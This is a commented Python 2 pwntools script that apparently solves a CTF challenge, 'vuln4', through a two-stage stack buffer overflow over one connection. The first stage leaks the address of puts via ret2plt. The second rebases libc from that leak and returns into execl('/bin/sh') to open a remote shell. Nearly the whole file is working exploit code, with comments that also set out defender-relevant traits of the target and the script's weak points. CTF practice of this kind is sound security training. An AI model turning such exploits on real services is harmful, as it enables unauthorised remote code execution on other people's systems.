#!/usr/bin/python
# CTF solver for the "vuln4" challenge: a stack-based buffer overflow used in two
# stages over one connection.
#   Stage 1: return into a PLT stub with a GOT slot as its argument so the
#            service prints a libc pointer back to us (ret2plt leak).
#   Stage 2: rebase hard-coded libc offsets on that leak and return into
#            execl("/bin/sh", ...) (ret2libc).
# What this tells a defender about the target binary (inferred from the
# addresses and payload shapes below, not stated anywhere in the script):
#   * every binary address is a fixed 0x0804xxxx value -> the executable is
#     non-PIE, so the leak only needs to defeat libc ASLR;
#   * 22 bytes of filler land directly on the saved return address -> no
#     stack canary between the buffer and the frame;
#   * the libc offsets (0x5FCA0, 0x3ada0, 0x15ba0b) are specific to the
#     challenge host's libc build and will not match any other system.
# Python 2 only: `print` is a statement and str/struct.pack output are
# concatenated directly; under Python 3 struct.pack returns bytes and L23/L31
# would raise TypeError.
import pwn
import struct
# All four are 4-byte little-endian addresses, pre-packed for splicing into payloads.
# Address returned into by the first overflow; the leaked value is later treated
# as puts' address (L25), so this is presumably puts@plt -- TODO confirm from the binary.
OFFSET_HEADSHOT = struct.pack("<L",0x080483A0)
# Return address used once the PLT call finishes; presumably re-enters the
# vulnerable read so a second payload can be sent -- verify in the disassembly.
OFFSET_RETN = struct.pack("<L",0x080484EA)
# Named "PLT" but used as the *argument* whose 4-byte contents come back in the
# reply, i.e. it behaves like a GOT slot (puts@got) rather than a PLT stub.
OFFSET_PLT = struct.pack("<L",0x08049874)
# "DCBA" marker; defined but never used in this script (debugging leftover).
OFFSET_ROPBREAK = struct.pack("<L",0x41424344)
# Single connection: both stages must go over the same socket, because the
# leaked libc address is only valid for this process instance.
p = pwn.remote("ctf.sharif.edu",4801)
# p = pwn.process("./vuln4")
# x = raw_input("Press enter to continue")
# Drain whatever the service prints first (banner/prompt); the content is not inspected.
p.recv()
# Stage 1 payload: 22 bytes of filler, then the classic call frame
# [return-into PLT stub][return address after it][argument], newline-terminated.
p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n")
# Whatever comes back is assumed to begin with the 4 leaked bytes. There is no
# length check: a short or empty read makes struct.unpack raise struct.error,
# and any prefix the service emits before the pointer silently corrupts the leak.
data = p.recv()
OFFSET_PUTS = struct.unpack("<L",data[0:4])[0]
# Rebase libc from the leaked pointer using the known offset of puts in the
# target's libc build (hard-coded; see header).
OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0
# Absolute addresses of execl and a "/bin/sh" string inside that libc.
OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0)
OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b)
print "puts at : %x" % OFFSET_PUTS
# print "libc at : %x" % OFFSET_LIBC
# Stage 2 payload, same frame shape: [execl][bogus return address][first argument].
# The first OFFSET_BINSH is only a placeholder return address; the second is
# execl's path argument. Remaining execl varargs are whatever is already on the
# stack, which the script does not control -- it relies on that working.
p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n")
# Hand the socket to the user for the resulting shell session.
p.interactive()